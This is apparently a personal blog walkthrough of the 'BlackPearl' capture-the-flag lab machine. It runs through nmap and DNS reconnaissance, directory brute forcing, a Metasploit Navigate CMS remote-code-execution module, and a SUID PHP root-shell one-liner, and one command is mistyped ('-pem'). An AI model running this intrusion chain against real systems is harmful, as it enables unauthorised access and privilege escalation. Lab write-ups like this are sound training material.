Introduction
Hey folks! So, I recently hacked this machine “BlackPearl”. It was a good refresher on my hacking skills. I will be honest with you all, I am not doing so much hacking nowadays. The reason is that I am kind of stepping into the world of Cloud and DevOps, so I have not been able to hack stuff. So, I thought, why not just do this it has been very long since I got hands-on, I did this and felt so good, the thrill of solving these machines can never be enough for me. Let us dive right in.
BlackPearl
First, let us launch the Blackpearl and Kali Linux machines. BlackPearl will look like this when booted.
Now when your Kali or any other Linux has booted up, let us be root and then carry on with our investigation on this machine, so go ahead and run this command.
sudo suThen note your machine IP address via running:
ifconfigNow we will run ping sweep so that we can see what all are the machines that are up in our network.
nmap -sn 10.0.2.0/24Our target machine is located at the IP 10.0.2.10. Let us run nmap on this IP to gather some more information about the system.
nmap -A -T4 -v -Pn -p- 10.0.2.10 >> blackpearl.txt&This command will make the nmap run in the background so that you can listen to Pirates of the Carribean theme song. After the job is completed, you can view the nmap results by opening the file.
After investigating this output we can state that there are 3 ports open 22, 53, 80 where SSH, DNS and HTTP services are running respectively. Let us start with the service at port 80. There is a normal nginx server running when browsing this IP.
We can see via nmap scan as well as wappalyzer that the nginx server is running 1.14.2 version, let’s look for exploits for this current version. There were some vulnerabilities but I dont think so they will work, let us move on to directory brute force to see any hidden directories on the server. Found directory /secret
gobuster dir -u http://10.0.2.10/ -w /opt/SecLists/Discovery/Web-Content/common.txtSo yeah, got trolled, nothing less expected from Captain Jack Sparrow. So, I guess directory brute forcing is a dead end as well as getting into http service. Moving on to the DNS service. Using dig for reverse lookup:
dig -x 10.0.2.10Another dead end with dig, let us go for dnsrecon this time.
dnsrecon -r 127.0.0.0/24 -n 10.0.2.10Some luck at last, lets add this host name to our host file and see what we were missing on the http service.
After browsing blackpearl.tcm we see that PHP is running on the server
Let us run directory brute force again on this domain. This time I am using different tool as this is recursive by default.
We found out this URL via brute forcing.
http://blackpearl.tcm/navigate/login.phpIt is some kind of CMS I guess, let us investigate this further. Using wappalyzer, it gave us:
After investigating the source code of the page we get to know the version of the CMS used:
Now we can look up for exploit for this version. Aaah, finally some promising stuff, let us launch msfconsole and exploit captain jack sparrows’s ship.
msfconsole
use multi/http/navigate_cms_rce
set rhosts http://blackpearl.tcm
exploitExploit!!
Apologies for the arbitrary characters there, I scrolled in the terminal by mistake. Hehe. Let's get a shell to the machine via meterpreter:
shellLet us spawn an interactive shell.
https://github.com/Sarthak044/Hackpy_101Now for privilege escalation, let us first search for files or directories with SUID bit set that we can exploit, after SUID go for sudo technique for seeing if the user has some permissions to run some files as sudo.
We found these files with SUID bit set via the command
find . -pem /4000The most interesting of them all is PHP, how you may ask? I don't know let's say this as gut after solving so many boxes you can kind of know these things. You can exploit with others too I guess if you tried, but PHP would be a less complex one and the most straight forward one. Lets go to gtfobins. We found php with SUID bit that can be exploited
/usr/bin/php7.3 -r “pcntl_exec(‘/bin/sh’, [‘-p’]);”And done.
Sorry Captain Jack Sparrow, but yet again your precious black pearl is taken.
